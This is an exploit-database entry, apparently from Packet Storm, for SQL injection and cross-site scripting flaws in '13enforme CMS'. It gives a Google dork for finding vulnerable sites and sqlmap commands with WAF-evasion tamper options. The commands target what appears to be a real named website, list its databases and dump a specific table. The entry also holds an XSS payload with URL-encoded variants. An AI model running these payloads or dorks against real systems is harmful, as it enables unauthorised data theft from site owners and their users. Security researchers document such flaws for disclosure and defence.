Share
## https://sploitus.com/exploit?id=PACKETSTORM:157094
# Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability  
# Google Dork:intext:"13enForme" +inurl:.php?id=  
# Date: 2020-04-03  
# Exploit Author: @ThelastVvV  
# Vendor Homepage: http://www.13enforme.com  
# Version: 1  
# Tested on: Ubuntu  
  
---------------------------------------------------------  
  
PoC 1:  
The attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp   
Payload(s)  
  
http://www.site.com/content.php?id=[]'[SQL INJECTION VULNERABILITY!]  
  
SQLMAP Payload(s):  
  
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs  
  
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D db538822134 --tables  
  
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D db538822134 -T plv   
  
  
  
  
PoC 2 :  
  
XSS Vulnerability  
  
Payload(s) :  
  
"><img src=x onerror=prompt(document.domain);>  
  
use payload:  
  
https://www.example/content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E  
  
www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>